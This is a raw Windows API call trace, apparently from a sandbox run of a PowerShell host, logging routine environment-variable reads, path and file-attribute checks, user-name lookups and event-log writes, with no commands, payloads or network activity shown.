	[0416.845] CoTaskMemFree (pv=0x33c760) 
	[0416.846] ReportEventW (hEventLog=0x1bb00008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2fc84b8*="Certificate", lpRawData=0x2fc8248) returned 1
	[0417.068] CoTaskMemAlloc (cb=0x104) returned 0x1b91c710
	[0417.068] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0417.068] CoTaskMemFree (pv=0x1b91c710) 
	[0417.071] GetLogicalDrives () returned 0x4
	[0417.072] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x20d270, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0417.072] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0417.073] CoTaskMemAlloc (cb=0x20e) returned 0x3a5900
	[0417.073] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x3a5900 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0417.073] CoTaskMemFree (pv=0x3a5900) 
	[0417.074] CoTaskMemAlloc (cb=0x104) returned 0x1b91c710
	[0417.074] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0417.074] CoTaskMemFree (pv=0x1b91c710) 
	[0417.075] CoTaskMemAlloc (cb=0x104) returned 0x1b91c710
	[0417.075] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0417.075] CoTaskMemFree (pv=0x1b91c710) 
	[0417.091] CoTaskMemAlloc (cb=0x104) returned 0x1b91c710
	[0417.091] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0417.091] CoTaskMemFree (pv=0x1b91c710) 
	[0417.092] CoTaskMemAlloc (cb=0x104) returned 0x1b91c710
	[0417.092] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0417.092] CoTaskMemFree (pv=0x1b91c710) 
	[0417.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x20cfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0417.093] SetErrorMode (uMode=0x1) returned 0x1
	[0417.093] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x20d230 | out: lpFileInformation=0x20d230*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0417.093] SetErrorMode (uMode=0x1) returned 0x1
	[0417.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x20cfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0417.093] SetErrorMode (uMode=0x1) returned 0x1
	[0417.093] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x20d230 | out: lpFileInformation=0x20d230*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0417.094] SetErrorMode (uMode=0x1) returned 0x1
	[0417.094] CoTaskMemAlloc (cb=0x104) returned 0x1b91c710
	[0417.094] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0417.094] CoTaskMemFree (pv=0x1b91c710) 
	[0417.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x20d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0417.099] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x20cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0417.099] SetErrorMode (uMode=0x1) returned 0x1
	[0417.100] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x20d1f0 | out: lpFileInformation=0x20d1f0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0417.100] SetErrorMode (uMode=0x1) returned 0x1
	[0417.100] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x20cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0417.100] SetErrorMode (uMode=0x1) returned 0x1
	[0417.100] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x20d1f0 | out: lpFileInformation=0x20d1f0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0417.376] SetErrorMode (uMode=0x1) returned 0x1
	[0417.376] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x20cff0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0417.376] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x20cee0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0417.376] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x20cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0417.376] SetErrorMode (uMode=0x1) returned 0x1
	[0417.376] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x20d1f0 | out: lpFileInformation=0x20d1f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0417.376] SetErrorMode (uMode=0x1) returned 0x1
	[0417.376] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x20cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0417.376] SetErrorMode (uMode=0x1) returned 0x1
	[0417.377] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x20d1f0 | out: lpFileInformation=0x20d1f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0417.377] SetErrorMode (uMode=0x1) returned 0x1
	[0417.377] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x20cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0417.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x20cee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0417.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x20cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0417.377] SetErrorMode (uMode=0x1) returned 0x1
	[0417.377] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x20d1f0 | out: lpFileInformation=0x20d1f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0417.377] SetErrorMode (uMode=0x1) returned 0x1
	[0417.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x20cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0417.377] SetErrorMode (uMode=0x1) returned 0x1
	[0417.377] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x20d1f0 | out: lpFileInformation=0x20d1f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0417.377] SetErrorMode (uMode=0x1) returned 0x1
	[0417.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x20cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0417.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x20cee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0417.378] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x20d020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0417.378] SetErrorMode (uMode=0x1) returned 0x1
	[0417.378] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x20d230 | out: lpFileInformation=0x20d230*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0417.378] SetErrorMode (uMode=0x1) returned 0x1
	[0417.378] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x20d020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0417.378] SetErrorMode (uMode=0x1) returned 0x1
	[0417.379] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x20d230 | out: lpFileInformation=0x20d230*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0417.379] SetErrorMode (uMode=0x1) returned 0x1
	[0417.379] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x20d030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0417.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x20cf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0417.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x20d020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0417.379] SetErrorMode (uMode=0x1) returned 0x1
	[0417.379] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x20d230 | out: lpFileInformation=0x20d230*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0417.379] SetErrorMode (uMode=0x1) returned 0x1
	[0417.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x20d020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0417.379] SetErrorMode (uMode=0x1) returned 0x1
	[0417.379] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x20d230 | out: lpFileInformation=0x20d230*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0417.380] SetErrorMode (uMode=0x1) returned 0x1
	[0417.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x20d030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0417.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x20cf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0417.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x20d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0417.382] SetErrorMode (uMode=0x1) returned 0x1
	[0417.382] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x20d4f0 | out: lpFileInformation=0x20d4f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0417.382] SetErrorMode (uMode=0x1) returned 0x1
	[0417.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0417.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0417.384] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0417.384] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0417.792] CoTaskMemAlloc (cb=0x804) returned 0x1b939a40
	[0417.792] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b939a40, nSize=0x20d858 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x20d858) returned 0x1
	[0417.792] CoTaskMemFree (pv=0x1b939a40) 
	[0417.792] CoTaskMemAlloc (cb=0x204) returned 0x33c760
	[0417.792] GetUserNameW (in: lpBuffer=0x33c760, pcbBuffer=0x20d898 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x20d898) returned 1
	[0417.793] CoTaskMemFree (pv=0x33c760) 
	[0417.794] ReportEventW (hEventLog=0x1bb00008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x30011a0*="Available", lpRawData=0x3000f30) returned 1
	[0418.084] CoTaskMemAlloc (cb=0x104) returned 0x1b91c710
	[0418.084] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0418.084] CoTaskMemFree (pv=0x1b91c710) 
	[0418.085] CoTaskMemAlloc (cb=0x104) returned 0x1b91c710
	[0418.086] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0418.086] CoTaskMemFree (pv=0x1b91c710) 
	[0418.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.092] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.093] CoTaskMemAlloc (cb=0x104) returned 0x1b91c710
	[0418.093] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x1b91c710, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0418.093] CoTaskMemFree (pv=0x1b91c710) 
	[0418.093] CoTaskMemAlloc (cb=0x104) returned 0x1b91c710
	[0418.093] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x1b91c710, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0418.093] CoTaskMemFree (pv=0x1b91c710) 
	[0418.094] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.094] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.094] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.094] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.094] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.095] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.095] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.095] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.095] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.095] GetCurrentProcessId () returned 0x998
	[0418.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
